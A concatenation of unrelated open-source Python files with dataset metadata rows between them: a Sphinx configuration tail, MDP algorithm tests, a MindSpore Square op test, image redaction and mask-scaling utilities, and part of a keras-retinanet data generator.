# html_short_title = None
# The name of an image file (relative to this directory) to place at the top of the sidebar.
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of the docs. This file should be a
# Windows icon file (.ico) being 16x16 or 32x32 pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here, relative to this directory. They are
# copied after the builtin static files, so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or .htaccess) here, relative to this directory.
# These files are copied directly to the root of the documentation.
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
# html_last_updated_fmt = None
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will contain a <link> tag referring to it. The
# value of this option must be the base URL from which the finished HTML is served.
# html_use_opensearch = ""
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index. Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
# html_search_language = "en"
# A dictionary with options for the search language support, empty by default. 'ja' uses this config value. 'zh' user
# can custom change `jieba` dictionary path.
# html_search_options = {"type": "default"}
# The name of a javascript file (relative to the configuration directory) that implements a search results scorer. If
# empty, the default will be used.
# html_search_scorer = "scorer.js"
# Output file base name for HTML help builder.
htmlhelp_basename = "headline-newsdoc"
# -- Options for LaTeX output ------------------------------------------------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# "papersize": "letterpaper",
# The font size ('10pt', '11pt' or '12pt').
#
# "pointsize": "10pt",
# Additional stuff for the LaTeX preamble.
#
# "preamble": "",
# Latex figure (float) alignment
#
# "figure_align": "htbp",
}
# Grouping the document tree into LaTeX files. List of tuples (source start file, target name, title, author,
# documentclass [howto, manual, or own class]).
latex_documents = [
("index",
"headline-news.tex",
u"headline-news Documentation",
u"companieshouse", "manual"),
]
# The name of an image file (relative to this directory) to place at the top of the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts, not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ------------------------------------------------------------------------------------
# One entry per manual page. List of tuples (source start file, name, description, authors, manual section).
man_pages = [
("index", "headline-news", u"headline-news Documentation",
[u"companieshouse"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ----------------------------------------------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples (source start file, target name, title, author, dir
# menu entry, description, category)
texinfo_documents = [
("index", "headline-news", u"headline-news Documentation",
u"companieshouse", "headline-news",
"Code behind the dashboard that helps ‘New Companies’ identify words/phrases in breaking news headlines", "Miscellaneous"),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = "footnote"
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# -- Options for autosection output ------------------------------------------------------------------------------------
# Prefix document path to section labels, otherwise autogenerated labels would look like 'heading'
# rather than 'path/to/file:heading'
autosectionlabel_prefix_document = True
# -- Options for autosummary output ------------------------------------------------------------------------------------
# Set the autosummary to generate stub files
autosummary_generate = True
# -- Options for Napoleon extension ------------------------------------------------------------------------------------
# Napoleon settings to enable parsing of Google- and NumPy-style docstrings.
# napoleon_google_docstring = True
# napoleon_numpy_docstring = True
# napoleon_include_init_with_doc = False
# napoleon_include_private_with_doc = False
# napoleon_include_special_with_doc = True
# napoleon_use_admonition_for_examples = False
# napoleon_use_admonition_for_notes = False
# napoleon_use_admonition_for_references = False
# napoleon_use_ivar = False
# napoleon_use_param = True
# napoleon_use_rtype = True
# -- Options for MySt --------------------------------------------------------------------------------------------------
# Enforce heading anchors for h1 to h6 headings
myst_heading_anchors = 6
| 36.666667 | 128 | 0.684273 |
1aed4b58f08b1baf98c81a4b8796f3409d43245e | 6,263 | py | Python | tests/test_mdp.py | upsidedownpancake/aima-python | 4f6c7167872d833714625cf3d25cc1f6f7cf15fe | [
"MIT"
] | 1 | 2018-05-12T17:17:05.000Z | 2018-05-12T17:17:05.000Z | tests/test_mdp.py | Abishek10/aima-python | 84586ceb8ea176b8f7d2efc5c913e7acb6004901 | [
"MIT"
] | null | null | null | tests/test_mdp.py | Abishek10/aima-python | 84586ceb8ea176b8f7d2efc5c913e7acb6004901 | [
"MIT"
] | null | null | null | from mdp import *
sequential_decision_environment_1 = GridMDP([[-0.1, -0.1, -0.1, +1],
[-0.1, None, -0.1, -1],
[-0.1, -0.1, -0.1, -0.1]],
terminals=[(3, 2), (3, 1)])
sequential_decision_environment_2 = GridMDP([[-2, -2, -2, +1],
[-2, None, -2, -1],
[-2, -2, -2, -2]],
terminals=[(3, 2), (3, 1)])
sequential_decision_environment_3 = GridMDP([[-1.0, -0.1, -0.1, -0.1, -0.1, 0.5],
[-0.1, None, None, -0.5, -0.1, -0.1],
[-0.1, None, 1.0, 3.0, None, -0.1],
[-0.1, -0.1, -0.1, None, None, -0.1],
[0.5, -0.1, -0.1, -0.1, -0.1, -1.0]],
terminals=[(2, 2), (3, 2), (0, 4), (5, 0)])
def test_value_iteration():
assert value_iteration(sequential_decision_environment, .01) == {
(3, 2): 1.0, (3, 1): -1.0,
(3, 0): 0.12958868267972745, (0, 1): 0.39810203830605462,
(0, 2): 0.50928545646220924, (1, 0): 0.25348746162470537,
(0, 0): 0.29543540628363629, (1, 2): 0.64958064617168676,
(2, 0): 0.34461306281476806, (2, 1): 0.48643676237737926,
(2, 2): 0.79536093684710951}
assert value_iteration(sequential_decision_environment_1, .01) == {
(3, 2): 1.0, (3, 1): -1.0,
(3, 0): -0.0897388258468311, (0, 1): 0.146419707398967840,
(0, 2): 0.30596200514385086, (1, 0): 0.010092796415625799,
(0, 0): 0.00633408092008296, (1, 2): 0.507390193380827400,
(2, 0): 0.15072242145212010, (2, 1): 0.358309043654212570,
(2, 2): 0.71675493618997840}
assert value_iteration(sequential_decision_environment_2, .01) == {
(3, 2): 1.0, (3, 1): -1.0,
(3, 0): -3.5141584808407855, (0, 1): -7.8000009574737180,
(0, 2): -6.1064293596058830, (1, 0): -7.1012549580376760,
(0, 0): -8.5872244532783200, (1, 2): -3.9653547121245810,
(2, 0): -5.3099468802901630, (2, 1): -3.3543366255753995,
(2, 2): -1.7383376462930498}
assert value_iteration(sequential_decision_environment_3, .01) == {
(0, 0): 4.350592130345558, (0, 1): 3.640700980321895, (0, 2): 3.0734806370346943, (0, 3): 2.5754335063434937, (0, 4): -1.0,
(1, 0): 3.640700980321895, (1, 1): 3.129579352304856, (1, 4): 2.0787517066719916,
(2, 0): 3.0259220379893352, (2, 1): 2.5926103577982897, (2, 2): 1.0, (2, 4): 2.507774181360808,
(3, 0): 2.5336747364500076, (3, 2): 3.0, (3, 3): 2.292172805400873, (3, 4): 2.996383110867515,
(4, 0): 2.1014575936349886, (4, 3): 3.1297590518608907, (4, 4): 3.6408806798779287,
(5, 0): -1.0, (5, 1): 2.5756132058995282, (5, 2): 3.0736603365907276, (5, 3): 3.6408806798779287, (5, 4): 4.350771829901593}
def test_policy_iteration():
assert policy_iteration(sequential_decision_environment) == {
(0, 0): (0, 1), (0, 1): (0, 1), (0, 2): (1, 0),
(1, 0): (1, 0), (1, 2): (1, 0), (2, 0): (0, 1),
(2, 1): (0, 1), (2, 2): (1, 0), (3, 0): (-1, 0),
(3, 1): None, (3, 2): None}
assert policy_iteration(sequential_decision_environment_1) == {
(0, 0): (0, 1), (0, 1): (0, 1), (0, 2): (1, 0),
(1, 0): (1, 0), (1, 2): (1, 0), (2, 0): (0, 1),
(2, 1): (0, 1), (2, 2): (1, 0), (3, 0): (-1, 0),
(3, 1): None, (3, 2): None}
assert policy_iteration(sequential_decision_environment_2) == {
(0, 0): (1, 0), (0, 1): (0, 1), (0, 2): (1, 0),
(1, 0): (1, 0), (1, 2): (1, 0), (2, 0): (1, 0),
(2, 1): (1, 0), (2, 2): (1, 0), (3, 0): (0, 1),
(3, 1): None, (3, 2): None}
def test_best_policy():
pi = best_policy(sequential_decision_environment,
value_iteration(sequential_decision_environment, .01))
assert sequential_decision_environment.to_arrows(pi) == [['>', '>', '>', '.'],
['^', None, '^', '.'],
['^', '>', '^', '<']]
pi_1 = best_policy(sequential_decision_environment_1,
value_iteration(sequential_decision_environment_1, .01))
assert sequential_decision_environment_1.to_arrows(pi_1) == [['>', '>', '>', '.'],
['^', None, '^', '.'],
['^', '>', '^', '<']]
pi_2 = best_policy(sequential_decision_environment_2,
value_iteration(sequential_decision_environment_2, .01))
assert sequential_decision_environment_2.to_arrows(pi_2) == [['>', '>', '>', '.'],
['^', None, '>', '.'],
['>', '>', '>', '^']]
pi_3 = best_policy(sequential_decision_environment_3,
value_iteration(sequential_decision_environment_3, .01))
assert sequential_decision_environment_3.to_arrows(pi_3) == [['.', '>', '>', '>', '>', '>'],
['v', None, None, '>', '>', '^'],
['v', None, '.', '.', None, '^'],
['v', '<', 'v', None, None, '^'],
['<', '<', '<', '<', '<', '.']]
def test_transition_model():
transition_model = {
"A": {"a1": (0.3, "B"), "a2": (0.7, "C")},
"B": {"a1": (0.5, "B"), "a2": (0.5, "A")},
"C": {"a1": (0.9, "A"), "a2": (0.1, "B")},
}
mdp = MDP(init="A", actlist={"a1","a2"}, terminals={"C"}, states={"A","B","C"}, transitions=transition_model)
assert mdp.T("A","a1") == (0.3, "B")
assert mdp.T("B","a2") == (0.5, "A")
assert mdp.T("C","a1") == (0.9, "A")
| 54.938596 | 159 | 0.422641 |
3a9b10c9befc583dd8a232020cfe2bda77aa828d | 1,370 | py | Python | tests/st/ops/ascend/test_tbe_ops/test_square.py | doc22940/mindspore | 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | [
"Apache-2.0"
] | 1 | 2020-05-13T11:31:21.000Z | 2020-05-13T11:31:21.000Z | tests/st/ops/ascend/test_tbe_ops/test_square.py | doc22940/mindspore | 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | [
"Apache-2.0"
] | null | null | null | tests/st/ops/ascend/test_tbe_ops/test_square.py | doc22940/mindspore | 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from mindspore import Tensor
from mindspore.ops import operations as P
import mindspore.nn as nn
from mindspore.common.api import ms_function
import numpy as np
import mindspore.context as context
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.square = P.Square()
def construct(self, x):
return self.square(x)
x = np.array([1.0, 4.0, 9.0]).astype(np.float32)
def test_net():
square = Net()
output = square(Tensor(x))
print(x)
print(output.asnumpy())
| 31.136364 | 78 | 0.69927 |
3ab4b4cbf2e2ff0e28c788c64a808a069500dde7 | 11,794 | py | Python | tools/common/image_utils.py | tribhuvanesh/visual_redactions | 93fac7b5cd9fc7e81341380408df6a8a4f8f6189 | [
"Apache-2.0"
] | 14 | 2018-07-03T09:30:02.000Z | 2020-12-23T05:46:11.000Z | tools/common/image_utils.py | tribhuvanesh/visual_redactions | 93fac7b5cd9fc7e81341380408df6a8a4f8f6189 | [
"Apache-2.0"
] | 2 | 2018-07-03T13:42:33.000Z | 2018-09-15T13:17:17.000Z | tools/common/image_utils.py | tribhuvanesh/visual_redactions | 93fac7b5cd9fc7e81341380408df6a8a4f8f6189 | [
"Apache-2.0"
] | 9 | 2018-07-25T02:47:43.000Z | 2022-02-17T13:28:49.000Z | #!/usr/bin/python
"""This is a short description.
Replace this with a more detailed description of what this file contains.
"""
import json
import time
import pickle
import sys
import csv
import argparse
import os
import os.path as osp
import shutil
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw, ImageFilter
from skimage.segmentation import slic, mark_boundaries
from scipy.misc import imread, imresize
from pycocotools import mask as mask_utils
__author__ = "Tribhuvanesh Orekondy"
__maintainer__ = "Tribhuvanesh Orekondy"
__email__ = "orekondy@mpi-inf.mpg.de"
__status__ = "Development"
def resize_min_side(pil_img, mins_len):
"""
Scale image such that minimum side is length mins_len pixels
:param pil_img: PIL image
:param mins_len: Size of minimum side after rescaling
:return:
"""
# What's the min side?
w, h = pil_img.size
if w < h:
new_w = mins_len
new_h = int(np.round(h * (new_w / float(w)))) # Scale height to same aspect ratio
else:
new_h = mins_len
new_w = int(np.round(w * (new_h / float(h)))) # Scale height to same aspect ratio
return pil_img.resize((new_w, new_h))
def bimask_to_rgba(bimask, color=np.array([95, 242, 186])):
h, w = bimask.shape
img_arr = np.zeros((h, w, 4))
# Set alpha
img_arr[:, :, -1] = bimask
img_arr[:, :, :3] = color
# return Image.fromarray(img_arr.astype('uint8'))
return img_arr
def get_image_size(img_path):
"""
Get image size as (width, height)
:param img_path:
:return: (width, height)
"""
im = Image.open(img_path)
return im.size
def draw_outline_on_img(pil_img, poly, color='yellow', width=4):
im = pil_img.copy()
draw = ImageDraw.Draw(im)
draw.line(poly, fill=color, width=4)
del draw
return im
def get_instance_crop(img_path, rle, bbox=None):
"""
:param img_path: Absolute path to image
:param rle: RLE-encoded instance
:param bbox: [x, y, w, h]
:return:
"""
if bbox is None:
bbox = mask_utils.toBbox(rle)
im = Image.open(img_path).convert('RGB')
imarr = np.asarray(im).copy()
bimask = mask_utils.decode(rle)
bimask = np.tile(bimask[:, :, None], 3) # RGB
imarr[bimask == 0] = 255 # Set pixels outside instance as white
x, y, w, h = bbox
masked_im = Image.fromarray(imarr).crop([x, y, x + w, y + h])
del im
del imarr
del bimask
return masked_im
def redact_img(pil_img, segmentation, fill='black', outline='black'):
if type(segmentation) is not list:
raise NotImplementedError
else:
polys = segmentation
if type(polys[0]) is not list:
polys = [polys, ]
im = pil_img.copy()
draw = ImageDraw.Draw(im)
for poly in polys:
draw.polygon(poly, fill=fill, outline=outline)
del draw
return im
def redact_img_mask(pil_img, bimask):
imarr = np.asarray(pil_img).copy()
mask3d = np.tile(bimask[:, :, None], 3)
imarr[np.where(bimask == 1)] = 0
im = Image.fromarray(imarr)
del mask3d
return im
def blur_region(org_im, poly, radius=2):
im = org_im.copy()
# Blur the entire image
blurred_image = im.filter(ImageFilter.GaussianBlur(radius=radius))
blurred_im_array = np.asarray(blurred_image)
# Generate a mask for the polygon
im_array = np.asarray(im).copy()
mask_im = Image.new('L', (im_array.shape[1], im_array.shape[0]), 0)
ImageDraw.Draw(mask_im).polygon(poly, outline=1, fill=1)
mask = np.array(mask_im)
# Copy this region from the blurred image on to the original
im_array[mask.astype(bool)] = blurred_im_array[mask.astype(bool)]
return Image.fromarray(im_array)
def fill_region(pil_img, poly, color='yellow'):
im = pil_img.copy()
draw = ImageDraw.Draw(im)
draw.polygon(poly, fill=color)
del draw
return im
def crop_region(org_im, poly, return_cropped=True, return_grayscale=False, bkg_fill=255):
im = org_im.copy()
# Generate a mask for the polygon
im_array = np.asarray(im).copy()
mask_im = Image.new('L', (im_array.shape[1], im_array.shape[0]), 0)
ImageDraw.Draw(mask_im).polygon(poly, outline=1, fill=1)
mask = np.array(mask_im)
new_im_array = np.ones_like(im_array) * bkg_fill
# Copy this region from the blurred image on to the original
new_im_array[mask.astype(bool)] = im_array[mask.astype(bool)]
# Instance is most likely surrounded by whitespace. Crop such that this is removed
if return_cropped:
min_i = np.where(np.sum(mask, axis=1) > 0)[0][0] # First non-zero element when summed column-wise
min_j = np.where(np.sum(mask, axis=0) > 0)[0][0] # First non-zero element when summed row-wise
max_i = np.where(np.sum(mask, axis=1) > 0)[0][-1] # Last non-zero element when summed column-wise
max_j = np.where(np.sum(mask, axis=0) > 0)[0][-1] # Last non-zero element when summed row-wise
new_im_array = new_im_array[min_i:max_i, min_j:max_j]
if return_grayscale:
new_im_array = np.dot(new_im_array[..., :3], [0.299, 0.587, 0.114])
try:
new_im = Image.fromarray(new_im_array)
except ValueError:
print 'im_array.shape = ', im_array.shape
print 'poly = ', poly
print 'min_i, max_i, min_j, max_j = ', min_i, max_i, min_j, max_j
print 'new_im_array.shape = ', new_im_array.shape
raise
if new_im.mode != 'RGB':
new_im = new_im.convert('RGB')
return new_im
def rgba_to_rgb(image, color=(255, 255, 255)):
"""Alpha composite an RGBA Image with a specified color.
Simpler, faster version than the solutions above.
Source: http://stackoverflow.com/a/9459208/284318
Source: http://www.javacms.tech/questions/56660/convert-rgba-png-to-rgb-with-pil
Keyword Arguments:
image -- PIL RGBA Image object
color -- Tuple r, g, b (default 255, 255, 255)
"""
image.load() # needed for split()
background = Image.new('RGB', image.size, color)
background.paste(image, mask=image.split()[3]) # 3 is the alpha channel
return background
def seg_to_adj(X):
"""
Convert a matrix of labels to an adjacency matrix
https://stackoverflow.com/questions/26486898/matrix-of-labels-to-adjacency-matrix
:param X: Matrix of labels (like ones produced by SLIC)
:return: Adjacency matrix
"""
n = len(np.unique(X))
G = np.zeros((n, n), dtype=np.int)
# left-right pairs
G[X[:, :-1], X[:, 1:]] = 1
# right-left pairs
G[X[:, 1:], X[:, :-1]] = 1
# top-bottom pairs
G[X[:-1, :], X[1:, :]] = 1
# bottom-top pairs
G[X[1:, :], X[:-1, :]] = 1
return G
def dilate_mask(_seg, _mask, c):
"""
Dilates bimask by a factor of c given SLIC label assignment mantrix _seg
:param _seg: N x M superpixel assignment matrix
:param _mask: N x M binary mask
:param c: dilation factor (>= 1.0)
:return: N x M dilated binary mask
"""
if c < 1.0:
raise ValueError('c needs to be >=1.0')
_mask = _mask.copy()
cur_pixels = np.sum(_mask)
target_pixels = min(c * cur_pixels, _mask.size)
vrts_all = set(np.unique(_seg))
vrts_in_mask = set(np.unique(_mask * _seg)) # in-vert
# First add all segments containing seed pixels with >25% overlap
# overlap_vrts = np.unique(segments * new_bimask)
for _v in list(vrts_in_mask):
# Add this vertex only if it overlaps > 25%
# Pixels in this superpixel
n_sup_pix = np.sum(_seg == _v)
# Pixels in overlap
n_overlap = np.sum(np.logical_and(_mask == 1, _seg == _v)).astype(np.float32)
if n_overlap / n_sup_pix > 0.25:
_mask[np.where(_seg == _v)] = 1.0
else:
vrts_in_mask.remove(_v)
cur_pixels = np.sum(_mask)
A = seg_to_adj(_seg)
while cur_pixels < target_pixels:
# for _i in range(2):
vrts_outside_mask = vrts_all - vrts_in_mask # out-vert
# Choose a single vrt from vrts_outside_mask to add to set
# For each out-vert get a count of how many edges it has to an in-vert
candidates = [] # List of (_v, _ne) where _ne = # edges with an in-vert
for _v in vrts_outside_mask:
adj_vrts = set(np.where(A[_v] > 0)[0])
_ne = len(vrts_in_mask & adj_vrts)
candidates.append((_v, _ne))
# Choose the best candidate
candidates = sorted(candidates, key=lambda x: -x[1])
max_ne = np.max(map(lambda x: x[1], candidates)) # What's the highest no. of edges for any node?
candidates = filter(lambda x: x[1] == max_ne, candidates) # Filter vertices with these many edges
candidates_v = [x[0] for x in candidates]
best_v = np.random.choice(candidates_v)
vrts_in_mask.add(best_v)
# Add this vertex to mask
_mask[np.where(_seg == best_v)] = 1.0
cur_pixels = np.sum(_mask)
return _mask
def contract_mask(_seg, _mask, c):
"""
Contracts bimask by a factor of c given SLIC label assignment mantrix _seg.
This is simply an inverse dilation problem. So, we perform dilation on an inverted mask.
:param _seg: N x M superpixel assignment matrix
:param _mask: N x M binary mask
:param c: dilation factor (>= 1.0)
:return: N x M dilated binary mask
"""
if c > 1.0:
raise ValueError('c needs to be <=1.0')
cur_pixels = np.sum(_mask)
target_pixels = c * cur_pixels
img_area = float(_mask.size)
# What is c in terms of #0s in the mask?
inv_mask = (_mask == 0).astype(int)
new_c = (img_area - target_pixels) / float(np.sum(inv_mask))
# print c, new_c, np.sum(_mask), np.sum(inv_mask)
new_inv_mask = dilate_mask(_seg, inv_mask, new_c)
new_mask = (new_inv_mask == 0).astype(np.uint8)
# print c, new_c, np.sum(_mask) / img_area, np.sum(new_mask) / img_area, np.unique(new_mask)
return new_mask
def resize_bimask(bimask, max_len=1000.):
org_h, org_w = bimask.shape
max_len = float(max_len)
if org_w > org_h:
new_w = max_len
new_h = (new_w / org_w) * org_h
else:
new_h = max_len
new_w = (new_h / org_h) * org_w
new_w, new_h = int(new_w), int(new_h)
new_bimask = imresize(bimask, (new_h, new_w)).astype(bimask.dtype)
return new_bimask
def scale_mask(im, bimask, c, n_segments=200, smoothen=True):
"""
Scale bimask for image im by a factor c
:param im:
:param bimask:
:param c:
:return:
"""
# Resize image so that SLIC is faster
# Resize image to a lower size
org_w, org_h = im.size
max_len = 1000.
if org_w > org_h:
new_w = max_len
new_h = (new_w / org_w) * org_h
else:
new_h = max_len
new_w = (new_h / org_h) * org_w
new_w, new_h = int(new_w), int(new_h)
new_im = im.resize((new_w, new_h))
new_bimask = imresize(bimask, (new_h, new_w))
segments = slic(new_im, n_segments=n_segments, slic_zero=True)
if c > 1.:
scaled_mask = dilate_mask(segments, new_bimask, c)
elif c < 1.:
scaled_mask = contract_mask(segments, new_bimask, c)
else:
scaled_mask = new_bimask
if smoothen:
smooth_bimask = Image.fromarray(scaled_mask.astype('uint8') * 255)
for i in range(10):
smooth_bimask = smooth_bimask.filter(ImageFilter.GaussianBlur)
scaled_mask = np.asarray(smooth_bimask) > 128
scaled_mask = scaled_mask.astype('uint8')
# Rescale this mask to original size
scaled_mask_highres = imresize(scaled_mask, (org_h, org_w), interp='nearest')
del new_im
del new_bimask
del scaled_mask
return scaled_mask_highres
| 29.558897 | 106 | 0.637443 |
f8f5d29809059157b48c92105d0c4b7eb538d214 | 18,493 | py | Python | keras_retinanet/preprocessing/generator.py | wawancenggoro/i3d_lung_nodule_detection_ori | e5e6fcd89603fb22a9926ad0930448fb493d5647 | [
"Apache-2.0"
] | 1 | 2019-03-02T07:15:58.000Z | 2019-03-02T07:15:58.000Z | keras_retinanet/preprocessing/generator.py | wawancenggoro/i3d_lung_nodule_detection_ori | e5e6fcd89603fb22a9926ad0930448fb493d5647 | [
"Apache-2.0"
] | null | null | null | keras_retinanet/preprocessing/generator.py | wawancenggoro/i3d_lung_nodule_detection_ori | e5e6fcd89603fb22a9926ad0930448fb493d5647 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import random
import warnings
import keras
from ..utils.anchors import (
anchor_targets_bbox,
anchors_for_shape,
guess_shapes
)
from ..utils.config import parse_anchor_parameters
from ..utils.image import (
TransformParameters,
adjust_transform_for_image,
apply_transform,
preprocess_image,
resize_image,
)
from ..utils.transform import transform_aabb
class Generator(keras.utils.Sequence):
""" Abstract generator class.
"""
def __init__(
self,
transform_generator = None,
batch_size=1,
group_method='ratio', # one of 'none', 'random', 'ratio'
shuffle_groups=True,
image_min_side=512,
image_max_side=512,
# image_min_side=800,
# image_max_side=1333,
transform_parameters=None,
compute_anchor_targets=anchor_targets_bbox,
compute_shapes=guess_shapes,
preprocess_image=preprocess_image,
config=None
):
""" Initialize Generator object.
Args
transform_generator : A generator used to randomly transform images and annotations.
batch_size : The size of the batches to generate.
group_method : Determines how images are grouped together (defaults to 'ratio', one of ('none', 'random', 'ratio')).
shuffle_groups : If True, shuffles the groups each epoch.
image_min_side : After resizing the minimum side of an image is equal to image_min_side.
image_max_side : If after resizing the maximum side is larger than image_max_side, scales down further so that the max side is equal to image_max_side.
transform_parameters : The transform parameters used for data augmentation.
compute_anchor_targets : Function handler for computing the targets of anchors for an image and its annotations.
compute_shapes : Function handler for computing the shapes of the pyramid for a given input.
preprocess_image : Function handler for preprocessing an image (scaling / normalizing) for passing through a network.
"""
self.transform_generator = transform_generator
self.batch_size = int(batch_size)
self.group_method = group_method
self.shuffle_groups = shuffle_groups
self.image_min_side = image_min_side
self.image_max_side = image_max_side
self.transform_parameters = transform_parameters or TransformParameters()
self.compute_anchor_targets = compute_anchor_targets
self.compute_shapes = compute_shapes
self.preprocess_image = preprocess_image
self.config = config
# Define groups
self.group_images()
# Shuffle when initializing
if self.shuffle_groups:
self.on_epoch_end()
def on_epoch_end(self):
if self.shuffle_groups:
random.shuffle(self.groups)
def size(self):
""" Size of the dataset.
"""
raise NotImplementedError('size method not implemented')
def num_classes(self):
""" Number of classes in the dataset.
"""
raise NotImplementedError('num_classes method not implemented')
def has_label(self, label):
""" Returns True if label is a known label.
"""
raise NotImplementedError('has_label method not implemented')
def has_name(self, name):
""" Returns True if name is a known class.
"""
raise NotImplementedError('has_name method not implemented')
def name_to_label(self, name):
""" Map name to label.
"""
raise NotImplementedError('name_to_label method not implemented')
def label_to_name(self, label):
""" Map label to name.
"""
raise NotImplementedError('label_to_name method not implemented')
def image_aspect_ratio(self, image_index):
""" Compute the aspect ratio for an image with image_index.
"""
raise NotImplementedError('image_aspect_ratio method not implemented')
def load_image(self, image_index):
""" Load an image at the image_index.
"""
raise NotImplementedError('load_image method not implemented')
def load_annotations(self, image_index):
""" Load annotations for an image_index.
"""
raise NotImplementedError('load_annotations method not implemented')
def load_annotations_group(self, group):
""" Load annotations for all images in group.
"""
annotations_group = [self.load_annotations(image_index) for image_index in group]
for annotations in annotations_group:
assert(isinstance(annotations, dict)), '\'load_annotations\' should return a list of dictionaries, received: {}'.format(type(annotations))
assert('labels' in annotations), '\'load_annotations\' should return a list of dictionaries that contain \'labels\', \'depths\', and \'bboxes\'.'
assert('bboxes' in annotations), '\'load_annotations\' should return a list of dictionaries that contain \'labels\', \'depths\', and \'bboxes\'.'
#ADDENDUM DEPTH
assert('depths' in annotations), '\'load_annotations\' should return a list of dictionaries that contain \'labels\', \'depths\', and \'bboxes\'.'
return annotations_group
def filter_annotations(self, image_group, annotations_group, group):
""" Filter annotations by removing those that are outside of the image bounds or whose width/height < 0.
"""
# test all annotations
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
# test x2 < x1 | y2 < y1 | x1 < 0 | y1 < 0 | x2 <= 0 | y2 <= 0 | x2 >= image.shape[1] | y2 >= image.shape[0]
# invalid_indices = np.where(
# (annotations['bboxes'][:, 2] <= annotations['bboxes'][:, 0]) |
# (annotations['bboxes'][:, 3] <= annotations['bboxes'][:, 1]) |
# (annotations['bboxes'][:, 0] < 0) |
# (annotations['bboxes'][:, 1] < 0) |
# (annotations['bboxes'][:, 2] > image.shape[1]) |
# (annotations['bboxes'][:, 3] > image.shape[0])
# )[0]
invalid_indices = np.where(
(annotations['bboxes'][:, 2] <= annotations['bboxes'][:, 0]) |
(annotations['bboxes'][:, 3] <= annotations['bboxes'][:, 1]) |
(annotations['bboxes'][:, 0] < 0) |
(annotations['bboxes'][:, 1] < 0) |
(annotations['bboxes'][:, 2] > image.shape[2]) |
(annotations['bboxes'][:, 3] > image.shape[1])
)[0]
# delete invalid indices
if len(invalid_indices):
warnings.warn('Image with id {} (shape {}) contains the following invalid boxes: {}.'.format(
group[index],
image.shape,
annotations['bboxes'][invalid_indices, :]
))
for k in annotations_group[index].keys():
annotations_group[index][k] = np.delete(annotations[k], invalid_indices, axis=0)
return image_group, annotations_group
def load_image_group(self, group):
""" Load images for all images in a group.
"""
return [self.load_image(image_index) for image_index in group]
def random_transform_group_entry(self, image, annotations, transform=None):
""" Randomly transforms image and annotation.
"""
# randomly transform both image and annotations
if transform is not None or self.transform_generator:
if transform is None:
transform = adjust_transform_for_image(next(self.transform_generator), image, self.transform_parameters.relative_translation)
# import IPython;IPython.embed()
# apply transformation to image
image = apply_transform(transform[1], image, self.transform_parameters)
# import IPython;IPython.embed()
# Transform the bounding boxes in the annotations.
# import IPython;IPython.embed()
annotations['bboxes'] = annotations['bboxes'].copy()
# import IPython;IPython.embed()
for index in range(annotations['bboxes'].shape[0]):
annotations['bboxes'][index, :] = transform_aabb(transform[0], annotations['bboxes'][index, :])
return image, annotations
def random_transform_group(self, image_group, annotations_group):
""" Randomly transforms each image and its annotations.
"""
assert(len(image_group) == len(annotations_group))
for index in range(len(image_group)):
# transform a single group entry
image_group[index], annotations_group[index] = self.random_transform_group_entry(image_group[index], annotations_group[index])
# import IPython;IPython.embed()
return image_group, annotations_group
def resize_image(self, image):
""" Resize an image using image_min_side and image_max_side.
"""
return resize_image(image, min_side=self.image_min_side, max_side=self.image_max_side)
